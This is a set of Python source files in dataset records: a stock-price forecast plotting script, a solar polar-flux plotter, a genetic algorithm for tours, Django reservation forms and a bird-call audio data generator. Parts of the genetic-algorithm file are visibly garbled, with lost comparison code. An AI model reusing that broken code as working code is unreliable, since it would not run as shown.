= [\"Close\", \"Open\", \"High\", \"Low\", \"Volume\"]\n window_size = 60\n\n show = False\n\n color_lines = ['#1f77b4', '#2ca02c', '#ff7f0e', '#d62728', '#9467bd', '#8c564b', '#bcbd22']\n color_palette = {\"blue\":\"#1f77b4\",\"wine_red\":\"#794044\",\"green\":\"#2ca02c\"}\n\n\n\n datasets = get_datasets(stock_name, data_columns, interval_min=interval_min,interval_max=interval_max)\n print(datasets[0].tail())\n\n data_test = [pd.DataFrame(ds).values for ds in datasets]\n\n dataframe = pd.DataFrame(datasets[0])\n data_dates = pd.to_datetime(dataframe.index.values, format='%Y-%m-%d')\n data_dates = [d.date() for d in data_dates]\n\n model = Model(model_name)\n model.load()\n\n x_test, y_test, y_test_s = model.window_data(data_test, window_size, False)\n\n real_stock_price = np.transpose(y_test_s)[0]\n\n fig = plt.figure(figsize=(16,7))\n\n ax1 = plt.subplot2grid((3, 6), (0, 0), colspan=3, rowspan=3)\n ax2 = plt.subplot2grid((3, 6), (0, 3), colspan=3, rowspan=3)\n\n today_date = data_dates[-1].strftime(\"%d.%m.%Y\")\n ax1.plot([data_dates[-1]], [real_stock_price[-1]], 'o', label=\"Heute - \"+today_date, color=color_palette[\"green\"], zorder=10)\n ax2.plot([data_dates[-1]], [real_stock_price[-1]], 'o', label=\"Heute - \"+today_date, color=color_palette[\"green\"], zorder=10)\n\n ax1.plot(data_dates[-view_length_1:], real_stock_price[-view_length_1:],'-', label ='bisheriger Preisverlauf',color=color_palette[\"blue\"])\n ax1.plot(data_dates[-view_length_1:], real_stock_price[-view_length_1:], ':', label ='gefilterter Preisverlauf', color=color_palette[\"blue\"], alpha=0.7)\n ax2.plot(data_dates[-view_length_2:], real_stock_price[-view_length_2:],'-', label ='bisheriger Preisverlauf',color=color_palette[\"blue\"])\n ax2.plot(data_dates[-view_length_2:], real_stock_price[-view_length_2:], ':', label ='gefilterter Preisverlauf', color=color_palette[\"blue\"], alpha=0.7)\n\n main_prediction = []\n #2 week plot\n prediction_length = 7\n for p in range(2):\n pos = p\n x_init = y_test[-pos - 1]\n predicted_stock_price = model.predict_sequence(x_init, normalize, prediction_length)[:,0]\n predicted_stock_price = np.insert(predicted_stock_price,0, y_test_s[-pos - 1][0])\n prediction_dates = [data_dates[-pos - 1]]\n for j in range(1, prediction_length + 1):\n prediction_dates.append(prediction_dates[j - 1] + dt.timedelta(days=1))\n delta_days = (data_dates[- 1] - data_dates[-pos - 1]).days\n\n #for later error tube\n if(p==0):\n main_prediction = [prediction_dates,np.array(predicted_stock_price)]\n ax1.plot(prediction_dates, predicted_stock_price, '--',\n label=str(prediction_length) + '-Tage Vorhersage vor '+str(delta_days)+' Tagen', color=color_lines[1 + p], zorder=5)\n zorder=5\n\n relative_prediction_positions = [i * 7 for i in range(0, 4)] # [0,5,10,15,20,30,35,40]\n prediction_lengths = [7 for r in range(len(relative_prediction_positions))] + [30]\n relative_prediction_positions = relative_prediction_positions + [0]\n\n for i in range(len(relative_prediction_positions)):\n pos = relative_prediction_positions[i]\n prediction_length = prediction_lengths[i]\n\n print(\"predicting \"+ str(prediction_length) +\" days from \" + str(pos) + \" days ago\")\n\n # Getting the predicted stock price\n\n #predict test by looking at last window_size entries of dataset_total\n x_init = y_test[-pos - 1]\n\n predicted_stock_price = model.predict_sequence(x_init, normalize, prediction_length)[:,0]\n predicted_stock_price = np.insert(predicted_stock_price,0, y_test_s[-pos - 1][0])\n\n #predicted_stock_price = 
sc.inverse_transform(np.reshape(predicted_stock_price,(-1,1)))\n\n prediction_dates = [data_dates[-pos-1]]\n for j in range(1,prediction_length+1):\n prediction_dates.append(prediction_dates[j-1] + dt.timedelta(days=1))\n\n #print(real_stock_price[-1],predicted_stock_price)\n\n delta_days = (data_dates[-1] - data_dates[-pos - 1]).days\n ax2.plot(prediction_dates, predicted_stock_price,\n '--', label=str(prediction_length) + '-Tage Vorhersage vor ' + str(delta_days) + \" Tagen\", color = color_lines[1 + i], zorder=zorder)\n zorder =0\n # Visualising the results\n fig.suptitle(stock_name, fontweight='bold',y=1.05,fontsize=20)\n ax1.set_title(\"letzte 2 Wochen\",fontsize=14)\n ax2.set_title(\"letzte \" + str(view_length_2) + \" Tage\",fontsize=14)\n ax1.set_xlabel('Datum')\n ax2.set_xlabel('Datum')\n ax1.set_ylabel('Preis')\n ax2.set_ylabel('Preis')\n ax1.legend(loc=0)\n ax2.legend(loc=0)\n\n props = dict(boxstyle='round,pad=1', facecolor=color_palette[\"blue\"],edgecolor=color_palette[\"blue\"], alpha=0.5)\n\n if evaluate_performance:\n prediction_sign_rates, prediction_mean, prediction_error = model.evaluate_prediction(y_test, real_stock_price, 30, normalize, 7)\n print(\"prediction sign rate \",prediction_sign_rates)\n print(\"prediction mean \",prediction_mean)\n print(\"prediction errors \", prediction_error)\n\n prediction_range = np.arange(7)\n errorinfo = \"Vorhersage Info: \\n\"\n\n #col_labels = [\"Tage\", \"Trend\", r\"$\\pm$\",r\"$\\updownarrow$\"]\n #row_labels = [str(i+1) for i in prediction_range]\n #plt.rc('text', usetex=True)\n #table = r\"\\begin{tabular}{ c | c | c | c } \"+ col_labels[0] + r\" & \" + col_labels[1] + r\" & \" + col_labels[2] + r\" & \" + col_labels[3] + r\" \\\\\\hline \"\n\n for i in prediction_range:\n #table+= row_labels[i] + \" & {0:.1f}\".format(prediction_mean[i] * 100.)+ \" & {0:.1f}\".format(prediction_error[i] * 100.)+ \" & {0:.1f}\".format(prediction_sign_rates[i] * 100.)\n errorinfo += r\"$\\delta_\" + str(i + 1) + \"=\" + \"{0:.1f}\".format(prediction_mean[i] * 100.) + \\\n r\"\\pm\" + \"{0:.1f}\".format(prediction_error[i] * 100.) + \"\\% \\sim \" + \"{0:.1f}\".format(prediction_sign_rates[i]* 100.) 
+ \"\\%$\"\n if (i < len(prediction_sign_rates) - 1):\n #table+=r\" \\\\\\hline \"\n errorinfo += \"\\n\"\n\n #table += r\" \\end{tabular}\"\n #table = r'''\\begin{tabular}{ c | c | c | c } & col1 & col2 & col3 \\\\\\hline row1 & 11 & 12 & 13 \\\\\\hline row2 & 21 & 22 & 23 \\\\\\hline row3 & 31 & 32 & 33 \\end{tabular}'''\n ax2.text(1.05, 0.5, errorinfo, transform=ax2.transAxes, fontsize=12,\n verticalalignment='top', bbox=props)\n #plt.rc('text', usetex=False)\n prediction_error = np.insert(prediction_error,0,0)\n ax1.fill_between(main_prediction[0],main_prediction[1]*(1-3*prediction_error),main_prediction[1]*(1+3*prediction_error),color=color_palette[\"green\"], alpha=.1)\n ax1.fill_between(main_prediction[0],main_prediction[1]*(1-2*prediction_error),main_prediction[1]*(1+2*prediction_error),color=color_palette[\"green\"], alpha=.2)\n ax1.fill_between(main_prediction[0],main_prediction[1]*(1-prediction_error),main_prediction[1]*(1+prediction_error),color=color_palette[\"green\"], alpha=.3)\n ax2.fill_between(main_prediction[0], main_prediction[1] * (1 - 3 * prediction_error),\n main_prediction[1] * (1 + 3 * prediction_error), color=color_palette[\"green\"], alpha=.1)\n ax2.fill_between(main_prediction[0], main_prediction[1] * (1 - 2 * prediction_error),\n main_prediction[1] * (1 + 2 * prediction_error), color=color_palette[\"green\"], alpha=.2)\n ax2.fill_between(main_prediction[0], main_prediction[1] * (1 - prediction_error),\n main_prediction[1] * (1 + prediction_error), color=color_palette[\"green\"], alpha=.3)\n\n ax2.text(1.05, 0.08, \"Modell: \\n\" + model_name, transform=ax2.transAxes, fontsize=10,\n verticalalignment='top', bbox=props)\n\n timestamp = dt.datetime.now().strftime(\"%d.%m.%Y / %H:%M:%S\")\n ax2.text(1.05, -0.05, \"Letzte Aktualisierung:\\n\" + timestamp, transform=ax2.transAxes, fontsize=10,\n verticalalignment='top', bbox=props)\n\n ax1.spines['top'].set_visible(False)\n ax2.spines['top'].set_visible(False)\n ax1.spines['right'].set_visible(False)\n ax2.spines['right'].set_visible(False)\n ax1.spines['bottom'].set_visible(False)\n ax2.spines['bottom'].set_visible(False)\n ax1.spines['left'].set_visible(False)\n ax2.spines['left'].set_visible(False)\n\n ax1.margins(0)\n ax2.margins(0)\n ax1.set_ylim(ax1.get_ylim()[0], ax1.get_ylim()[1] * 1.02)\n ax2.set_ylim(ax2.get_ylim()[0], ax2.get_ylim()[1] * 1.02)\n\n ax1.xaxis.set_major_formatter(mdates.DateFormatter('%d.%m.%Y'))\n ax2.xaxis.set_major_formatter(mdates.DateFormatter('%d.%m.%Y'))\n ax1.xaxis.set_major_locator(mdates.DayLocator(interval=int(view_length_2 / 7)))\n ax1.xaxis.set_minor_locator(mdates.DayLocator(interval=1))\n ax2.xaxis.set_major_locator(mdates.DayLocator(interval=int(view_length_2 / 7)))\n ax2.xaxis.set_minor_locator(mdates.DayLocator(interval=1))\n #plt.gcf().autofmt_xdate()\n plt.setp(plt.xticks()[1], rotation=30, ha='right')\n fig.tight_layout()\n ax1.grid(True,'major',ls='--',lw=.8,c='black',alpha=.3)\n ax1.grid(True,'minor',ls=':',lw=.5,c='k',alpha=.3)\n ax2.grid(True,'major',ls='--',lw=.8,c='black',alpha=.3)\n ax2.grid(True,'minor',ls=':',lw=.5,c='k',alpha=.3)\n\n ax1.fill_between(data_dates[-view_length_1:], ax1.get_ylim()[0], real_stock_price[-view_length_1:],\n color=color_palette[\"blue\"], alpha=.3)\n ax2.fill_between(data_dates[-view_length_2:], ax2.get_ylim()[0], real_stock_price[-view_length_2:],\n color=color_palette[\"blue\"], alpha=.3)\n\n\n plt.savefig(os.path.join(abs_dir, \"figs/\" + stock_name + \"_\" + str(view_length_2) + \".png\"),bbox_inches='tight',dpi=100)\n if(show):\n 
plt.show()\n else:\n plt.close()\n print(\"Test for \" + stock_name +\" with model \" + model_name + \" for \" + str(view_length_2) + \" days done\")\n","sub_path":"main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":11333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"156821374","text":"\"\"\"This is a script that reads in h5 files and plots the instruments\neach a different color.\"\"\"\nimport pandas as pd\nimport numpy as np\nimport datetime as dt\nimport matplotlib.pyplot as plt\nfrom uncertainty import Measurement as M\n\n#Plot Northern Hemisphere\ndef pf1(c):\n plt.subplot(211)\n plt.plot(date, normflux_n, color = c, marker = '.', linestyle = 'None')\n plt.axis([dt.datetime(1976,1,1), dt.datetime(2016,7,5), -3e22, 3e22])\n plt.xlabel('Year')\n plt.ylabel('Total Signed Flux (Mx)')\n plt.title('North Pole (above $65^\\circ$)')\n\n#Plot Southern Hemisphere\ndef pf2(c):\n plt.subplot(212)\n plt.plot(date, normflux_s, color = c, marker = '.', linestyle = 'None')\n plt.axis([dt.datetime(1976,1,1), dt.datetime(2016,7,5), -3e22, 3e22])\n plt.xlabel('Year')\n plt.ylabel('Total Signed Flux (Mx)')\n plt.title('South Pole (below $65^\\circ$)')\n\n\nfiles = ['512.h5', 'SPMG.h5', 'MDI.h5', 'hmi.h5']\n#files = [\"PF_data1976-01-13_1993-04-09.csv\", \"PF_data1976-01-13_1993-04-11.csv\"]\ncarr = ['red', 'yellow', 'green', 'blue']\n#data = [pd.read_csv(files[0]), pd.read_csv(files[1]), pd.read_csv(files[2]), pd.read_csv(files[3])]\nj = 0\n\nfor f in files:\n hdf = pd.read_hdf(f)\n date = hdf['date']\n visarea_n = np.array([x.v for x in hdf['visarea_n'].values])\n visarea_s = np.array([x.v for x in hdf['visarea_s'].values])\n maxarea = 2*np.pi*6.95508e10**2*(1-np.cos(np.deg2rad(90-75))) \n pfNorth = np.array([x.v for x in hdf['sfluxc_n'].values])\n pfSouth = np.array([x.v for x in hdf['sfluxc_s'].values])\n normflux_n = pfNorth*maxarea/visarea_n\n normflux_s = pfSouth*maxarea/visarea_s\n plt.subplots_adjust(hspace = .40)\n pf1(carr[j])\n pf2(carr[j])\n j = j + 1\n\nplt.show()\n","sub_path":"PF_ALL_vs_date.py","file_name":"PF_ALL_vs_date.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"443381300","text":"#genetic algorithm\r\n#reading file\r\nfor k in range(50):\r\n import random\r\n f = open(\"NEWAISearchfile012.txt\",\"r\")\r\n contents = f.read()\r\n f.close()\r\n tour_size = 0\r\n dists = []\r\n edges = []\r\n numbers = [\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\"]\r\n for i in contents.split(\",\"):\r\n dists.append(i.strip())\r\n dists[1] = dists[1].replace(\"SIZE = \",\"\")\r\n name = dists[0]\r\n del dists[0]\r\n size = int(dists[0])\r\n del dists[0]\r\n for i in range(len(dists)):\r\n if dists[i].isdigit() == False:\r\n for j in range(len(dists[i])):\r\n if dists[i][j] not in numbers:\r\n dists[i] = dists[i].replace(dists[i][j],\"\")\r\n point = -1\r\n for i in range(size):\r\n edges.append([])\r\n for j in range(size):\r\n if j==i:\r\n edges[i].append(0)\r\n elif i==0:\r\n point+=1\r\n edges[i].append(int(dists[point]))\r\n elif j=total:\r\n parents.append(tours[i])\r\n break\r\n else:\r\n total+=probs[i]\r\n offspring = []\r\n for i in range(int(pop_size/2)):\r\n num1 = random.randint(0,len(parents)-1)\r\n parent1 = parents[num1]\r\n del parents[num1]\r\n num2 = random.randint(0,len(parents)-1)\r\n parent2 = parents[num2]\r\n del parents[num2]\r\n cross = random.uniform(0,1)\r\n mutant = 
random.uniform(0,1)\r\n if cross 0:\n #\n # check that all terms are free\n #\n booked = Reservation.objects.book_weekly (from_date, \n until_date,\n commit=False,\n created_on=r.created_on,\n type=r.type,\n description=r.description,\n user=r.user,\n vacancy=r.vacancy)\n if new_res_count == len(booked):\n #\n # there is place for all reservations, save the to the DB\n #\n booked = Reservation.objects.book_weekly (from_date, \n until_date,\n commit=True,\n created_on=r.created_on,\n type=r.type,\n description=r.description,\n user=r.user,\n vacancy=r.vacancy)\n #\n # the repeating series identifier for the first reservation\n #\n r.repeat_series = booked[0].repeat_series\n else:\n #\n # not all terms are free\n #\n raise ValueError (_(\"No free terms for all reservations\"))\n #\n # don't forget to save the original instance\n #\n if commit:\n r.save ( )\n return r\n\n\n def clean (self):\n \"\"\"\n Checks that repeat_until is later than the first reservation date.\n If repeat weekly is on, the description should be given.-\n \"\"\"\n cleaned_data = self.cleaned_data\n is_repeat = cleaned_data.get ('repeat')\n from_date = cleaned_data.get ('for_date')\n until_date = cleaned_data.get ('repeat_until')\n description = cleaned_data.get ('description')\n \n if is_repeat:\n if from_date > until_date:\n raise forms.ValidationError (_('Please check the dates!'))\n if (len(description) == 0) or (description.isspace ( )):\n raise forms.ValidationError (_('This field is required'))\n return cleaned_data\n \n\nclass SelectDateForm (forms.Form):\n \"\"\"\n A form to select for which date to display reservations.-\n \"\"\"\n for_date = forms.DateField (initial=date.today ( ))\n \n \nclass SearchFreeCourtForm (forms.Form):\n \"\"\"\n A form to look for a free court and potentially make a reservation.-\n \"\"\"\n #\n # set up the dates drop-down\n #\n today = date.today ( )\n tomorrow = today + timedelta (days=1)\n DATES = [(today.toordinal ( ), _('Today')),\n (tomorrow.toordinal ( ), _('Tomorrow'))]\n for d in range (2, 7):\n day_offset = timedelta (days=d)\n day = today + day_offset\n DATES.append ((day.toordinal ( ), \n date.strftime (day,\n locale.nl_langinfo (locale.D_FMT))))\n #\n # set up the times drop-down\n #\n TIMES = [('XX', _('-- anytime --')),\n ('AM', _('Morning')),\n ('PM', _('Afternoon')),\n ('EV', _('Evening'))]\n for k,v in Vacancy.HOURS[:-1]:\n TIMES.append ((str(k), v))\n #\n # set up the reservation length drop-down\n # \n HOURS = ((1, _('1 hour')),\n (2, _('2 hours')),\n (3, _('3 hours')))\n \n location = ModelChoiceField (queryset=City.objects.all ( ).order_by ('name'),\n empty_label=_('-- anywhere --'),\n required=False)\n for_date = ChoiceField (choices=DATES,\n initial=today)\n for_time = ChoiceField (choices=TIMES,\n initial='XX')\n hours = ChoiceField (choices=HOURS,\n initial=1)\n \n","sub_path":"reservations/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":7754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"398427323","text":"from __future__ import division\nimport numpy as np\nimport librosa \nimport csv\nimport os\nimport glob\nimport warnings\nimport multiprocessing\nimport sys\nimport random\nimport copy\nimport time\nimport tensorflow as tf\n\nwarnings.filterwarnings('ignore')\n\nclass Dataset(object):\n \"\"\"Implements the dataset properties\n \"\"\"\n\n def __init__(self,path=\"\",is_training_set=True):\n\n #Paths\n self.is_training_set = is_training_set\n self.path = path\n 
self.train_audio_path = os.path.join(path,\"train_audio\")\n self.train_csv_path = os.path.join(path,\"train.csv\")\n self.train_dict = self.csv_to_dict(self.train_csv_path)\n #Path of \"false\" audio samples\n self.false_audio_path = os.path.join(path,\"false_audio\")\n #Path to test audio\n self.test_audio_path = os.path.join(path,\"example_test_audio\")\n self.test_csv_path = os.path.join(path,\"test.csv\")\n self.test_dict = self.csv_to_dict(self.test_csv_path)\n self.test_meta_path = os.path.join(path,\"example_test_audio_metadata.csv\")\n self.test_dict = self.csv_to_dict(self.test_meta_path,self.test_dict)\n self.test_summary_path = os.path.join(path,\"example_test_audio_summary.csv\")\n self.test_dict = self.csv_to_dict(self.test_summary_path,self.test_dict)\n self.prepare()\n \n def csv_to_dict(self,path,data_dict = None):\n if data_dict == None:\n data_dict = {}\n with open(path, mode='r') as infile:\n reader = csv.reader(infile)\n first_row = True\n for rows in reader:\n if first_row:\n col_names = rows\n first_row = False\n for name in col_names:\n data_dict[name] = []\n col_ct = 0\n for name in col_names:\n data_dict[name].append(rows[col_ct])\n col_ct += 1\n return data_dict\n \n\n def prepare(self):\n \"\"\"Prepares the Dataset class for use.\n \"\"\"\n if self.is_training_set:\n #Prepare train samples \n \n #Create bird mapping name->int\n if not(os.path.isfile(os.path.join(self.path,\"bird_dict.npy\"))):\n all_birds = self.train_dict['ebird_code']\n self.unique_birds_ebird_codes = np.unique(all_birds)\n self.bird_dict ={}\n bird_id = 0 \n for ebird_code in self.unique_birds_ebird_codes:\n self.bird_dict[ebird_code] = bird_id\n bird_id += 1\n \n \n np.save(os.path.join(self.path,\"bird_dict.npy\"),self.bird_dict)\n else:\n self.bird_dict = np.load(os.path.join(self.path,\"bird_dict.npy\"),allow_pickle=True).item()\n \n self.n_classes = len(self.bird_dict.keys())\n \n self.train_samples = []\n mp3_filenames = glob.glob(self.train_audio_path + \"/**/*\", \n recursive = True)\n for i_row in range(1,len(self.train_dict['filename'])):\n sample = {}\n for key in self.train_dict:\n if len(self.train_dict[key])>i_row:\n if key == 'filename':\n search_name = self.train_dict[key][i_row]\n for name in mp3_filenames:\n if search_name in name:\n sample[key] = name\n break\n elif key == 'ebird_code':\n sample['bird_id'] = self.bird_dict[self.train_dict[key][i_row]]\n else:\n sample[key] = self.train_dict[key][i_row]\n else:\n sample[key] = None\n \n \n self.train_samples.append(sample)\n self.n_samples = len(self.train_samples)\n \n else:\n #Prepare test samples\n self.test_samples = []\n try:\n self.bird_dict = np.load(os.path.join(self.path,\"bird_dict.npy\"),allow_pickle=True).item()\n except:\n raise(\"Run first with training set to create bird mapping!\")\n \n mp3_filenames = glob.glob(self.test_audio_path + \"/**/*\", \n recursive = True)\n for i_row in range(1,len(self.test_dict['filename'])):\n sample = {}\n for key in self.test_dict:\n if len(self.test_dict[key])>i_row:\n if key == 'filename':\n search_name = self.test_dict[key][i_row]\n for name in mp3_filenames:\n if search_name in name:\n sample[key] = name\n break\n else:\n sample[key] = self.test_dict[key][i_row]\n else:\n sample[key] = None\n \n self.test_samples.append(sample)\n self.n_samples = len(self.test_samples)\n \nclass DataGenerator(object):\n def __init__(self,dataset,augmentation,\n shuffle = True,\n is_training = True,\n is_validation = False,\n force_feature_recalc = False,\n preload_false_samples = True,\n 
preload_samples = False,\n training_percentage = 90,\n save_created_features = True,\n max_time = 5,\n max_samples_per_audio = 6,\n n_fft = 2048,\n hop_length = 512,\n sampling_rate = 22050):\n self.dataset = dataset\n #Shuffle files before loading since dataset is ordered by class\n if shuffle:\n random.seed(4)\n random.shuffle(self.dataset.train_samples)\n \n self.n_training_samples = int(dataset.n_samples*training_percentage/100)\n self.n_validation_samples = dataset.n_samples-self.n_training_samples\n self.augmentation = augmentation\n self.is_training = is_training\n self.is_validation = is_validation\n self.sampling_rate = sampling_rate\n self.n_fft = n_fft\n self.preload_samples = preload_samples\n self.preload_false_samples = preload_false_samples\n self.hop_length = hop_length\n self.max_time = max_time\n self.max_samples_per_audio = max_samples_per_audio\n self.force_feature_recalc = force_feature_recalc\n self.save_created_features = save_created_features\n if self.is_training:\n self.first_sample = 0\n self.last_sample = self.n_training_samples\n elif self.is_validation:\n self.first_sample = self.n_training_samples\n self.last_sample = self.dataset.n_samples\n #Get paths of false samples\n false_samples_mono = glob.glob(self.dataset.false_audio_path+ \"/mono/*.npz\", \n recursive = True)\n \n false_samples_stereo = glob.glob(self.dataset.false_audio_path+ \"/stereo/*.npz\", \n recursive = True)\n \n self.false_sample_paths = false_samples_mono + false_samples_stereo\n #Pre load false samples\n if self.preload_false_samples:\n self.preloaded_false_samples = {}\n for path in self.false_sample_paths:\n with np.load(path,allow_pickle=True) as sample_file:\n self.preloaded_false_samples[path] = sample_file.f.arr_0\n print(\"Finished pre-loading false samples!\")\n \n \n if self.is_training or self.is_validation:\n self.samples = self.dataset.train_samples[self.first_sample:self.last_sample]\n else:\n self.samples = self.dataset.test_samples\n #Pre load samples (takes a lot of RAM ~130 GB)\n try:\n if self.preload_samples:\n self.preloaded_samples = {}\n for sample in self.samples:\n path = sample[\"filename\"].replace(\"mp3\",\"npz\")\n with np.load(path,allow_pickle=True) as sample_file:\n self.preloaded_samples[path] = sample_file.f.arr_0\n print(\"Finished pre-loading samples\")\n except:\n self.preload_samples = False\n\n def do_stft(self,y,channels):\n spectra = []\n #STFT for all channels\n for channel in range(channels):\n spectrum = np.abs(librosa.core.stft(y[channel,:],\n n_fft = self.n_fft,\n hop_length = self.hop_length,\n window = 'hann', \n center = True))\n spectrum = np.asarray(spectrum,dtype=np.float32)\n spectra.append(spectrum)\n spectra = np.stack(spectra,axis=0)\n return spectra\n \n def pad_sample(self,spectrum,x_size=np.ceil(5*22050/512)):\n diff = int(x_size) - spectrum.shape[-1]\n if diff == 0:\n return spectrum\n if diff > spectrum.shape[-1]:\n while spectrum.shape[-1] < x_size:\n spectrum = np.concatenate([spectrum,spectrum],axis=-1)\n \n spectrum = spectrum[:,:,:int(x_size)]\n else:\n #First element is often zero. 
To avoid jump skip first element\n if diff+1 < spectrum.shape[-1]:\n spectrum = np.concatenate([spectrum,spectrum[:,:,1:diff+1]],axis=-1)\n else:\n spectrum = np.concatenate([spectrum,spectrum[:,:,:diff]],axis=-1)\n\n return spectrum\n \n def create_feature(self,sample):\n \"\"\"Creates the features by doing a STFT\"\"\"\n\n filename = sample['filename']\n channels_str = sample['channels']\n channels = int(channels_str.split(\" \")[0])\n if channels == 1:\n mono = True\n else:\n mono = False\n y, sr = librosa.core.load(filename,mono=mono,sr=self.sampling_rate)\n \n y,_ = librosa.effects.trim(y)\n if mono == True:\n y = np.expand_dims(y,0)\n\n duration = y.shape[-1]/self.sampling_rate\n n_samples = int(np.ceil(duration/self.max_time))\n n_samples = min(n_samples,self.max_samples_per_audio)\n spectra = {}\n for i_sample in range(n_samples):\n start = i_sample*int(self.sampling_rate*self.max_time)\n end = (i_sample+1)*int(self.sampling_rate*self.max_time)\n end = min(end,y.shape[-1])\n y_sample = y[:,start:end]\n if y_sample.shape[-1] == 1:\n break\n #Transform audio\n spectrum = self.do_stft(y_sample,channels)\n #Pad spectrum\n spectrum = self.pad_sample(spectrum,\n x_size=np.ceil(self.max_time*self.sampling_rate/self.hop_length))\n spectra[str(i_sample)] = spectrum\n \n if self.save_created_features:\n if \"mp3\" in filename:\n np.savez(filename.replace(\"mp3\",\"npz\"),spectra)\n else:\n np.savez(filename.replace(\"wav\",\"npz\"),spectra)\n\n return spectra\n \n def create_all_features(self):\n if self.is_training:\n samples = self.dataset.train_samples\n else:\n samples = self.dataset.test_samples\n\n n = len(samples)\n\n ct = 0 \n for sample in samples:\n spectra = self.create_feature(sample)\n if np.any(spectra) == None:\n print(sample[\"filename\"]+\" failed!\")\n else:\n print(\"Calculated \"+str(ct/n*100)+\"% of samples...\")\n\n ct += 1 \n \n def create_all_features_multi_cpu(self):\n \n if self.is_training:\n all_samples = self.dataset.train_samples\n else:\n all_samples = self.dataset.test_samples\n \n samples = []\n for sample in all_samples:\n filename = sample['filename']\n if not(os.path.isfile(filename.replace(\"mp3\",\"npz\"))) or self.force_feature_recalc:\n samples.append(sample)\n \n print(str(len(all_samples)-len(samples))+\" feature samples already exist\")\n \n n = len(samples)\n \n pool = multiprocessing.Pool(os.cpu_count())\n for i, _ in enumerate(pool.imap_unordered(self.create_feature, samples), 1):\n sys.stderr.write('\\rdone {0:%}'.format(max(0,i/n)))\n \n def create_false_features_multi_cpu(self):\n \n \n filenames_mono = glob.glob(self.dataset.false_audio_path+ \"/mono/*.wav\", \n recursive = True)\n \n filenames_stereo = glob.glob(self.dataset.false_audio_path+ \"/stereo/*.wav\", \n recursive = True)\n\n samples = []\n\n for filename in filenames_mono:\n if not(os.path.isfile(filename.replace(\"wav\",\"npz\"))) or self.force_feature_recalc:\n samples.append({'filename':filename,'channels':'1 mono'})\n\n\n for filename in filenames_stereo:\n if not(os.path.isfile(filename.replace(\"wav\",\"npz\"))) or self.force_feature_recalc:\n samples.append({'filename':filename,'channels':'2 stereo'})\n \n print(str(len(filenames_mono)+len(filenames_stereo)-len(samples))+\" feature samples already exist\")\n \n n = len(samples)\n\n pool = multiprocessing.Pool(os.cpu_count())\n for i, _ in enumerate(pool.imap_unordered(self.create_feature, samples), 1):\n sys.stderr.write('\\rdone {0:%}'.format(max(0,i/n)))\n \n def generate_all_samples_from_scratch(self):\n stft_len = 
int(np.ceil(self.max_time*self.sampling_rate/self.hop_length))\n\n for sample in self.samples:\n\n filename = sample['filename']\n #Create features via STFT if no file exists\n spectra = self.create_feature(sample)\n \n for spec_key in spectra.keys():\n #Check for None type\n spectrum = spectra[spec_key]\n if np.any(spectrum) == None or spectrum.shape[-1] != stft_len:\n continue\n \n #If only mono --> duplicate\n if spectrum.shape[0] == 1:\n spectrum = np.tile(spectra[spec_key],[2,1,1])\n \n #Transpose spectrogramms for \"channels_last\"\n spectrum = tf.transpose(spectrum,perm=[1,2,0])\n \n #Fill false spectra with zero\n false_spectrum = tf.zeros_like(spectrum)\n \n if self.is_training or self.is_validation:\n label = tf.one_hot(sample['bird_id'],self.dataset.n_classes+1)\n else:\n label = None\n\n sub_sample = {'input_features':spectrum,\n 'labels':label,\n 'false_sample':false_spectrum}\n \n if self.augmentation != None:\n yield self.augmentation(sub_sample,self.is_training)\n else:\n yield sample\n \n def generate(self):\n \n \n stft_len = int(np.ceil(self.max_time*self.sampling_rate/self.hop_length))\n\n for sample in self.samples:\n\n filename = sample['filename']\n #If feature was already created load from file\n if os.path.isfile(filename.replace(\"mp3\",\"npz\")) and not(self.force_feature_recalc):\n if self.preload_samples:\n spectra_npz = self.preloaded_samples[filename.replace(\"mp3\",\"npz\")]\n else:\n with np.load(filename.replace(\"mp3\",\"npz\"),allow_pickle=True) as sample_file:\n spectra_npz = sample_file.f.arr_0\n \n spec_keys = spectra_npz.item().keys()\n spec_keys = list(spec_keys)\n rnd_key = spec_keys[np.random.randint(0,len(spec_keys))]\n spectra = spectra_npz.item()[rnd_key]\n else:\n #Create features via STFT if no file exists\n spectra = self.create_feature(sample)\n spec_keys = spectra.keys()\n spec_keys = list(spec_keys)\n rnd_key = spec_keys[np.random.randint(0,len(spec_keys))]\n spectra = spectra[rnd_key]\n\n #Check for None type\n if np.any(spectra) == None or spectra.shape[-1] != stft_len:\n continue\n \n #Get false sample\n rnd_false_sample = random.choice(self.false_sample_paths)\n\n if self.preload_false_samples:\n false_spectra_npz = self.preloaded_false_samples[rnd_false_sample]\n else:\n with np.load(rnd_false_sample,allow_pickle=True) as sample_file:\n false_spectra_npz = sample_file.f.arr_0\n \n false_spec_keys = false_spectra_npz.item().keys()\n false_spec_keys = list(false_spec_keys)\n false_rnd_key = false_spec_keys[np.random.randint(0,len(false_spec_keys))]\n false_spectra = false_spectra_npz.item()[false_rnd_key]\n\n #If only mono --> duplicate\n if spectra.shape[0] == 1:\n spectra = np.tile(spectra,[2,1,1])\n \n \n #If false only mono --> duplicate\n if false_spectra.shape[0] == 1:\n false_spectra = np.tile(false_spectra,[2,1,1])\n\n #Transpose spectrogramms for \"channels_last\"\n spectra = tf.transpose(spectra,perm=[1,2,0])\n false_spectra = tf.transpose(false_spectra,perm=[1,2,0])\n\n sample = {'input_features':spectra,\n 'labels':tf.one_hot(sample['bird_id'],self.dataset.n_classes+1),\n 'false_sample':false_spectra}\n if self.augmentation != None:\n yield self.augmentation(sample,self.is_training)\n else:\n yield sample\n\nif __name__ == \"__main__\":\n ds = Dataset(\"/srv/TUG/datasets/cornell_birdcall_recognition\")\n dg = DataGenerator(ds,None,force_feature_recalc=True)\n 
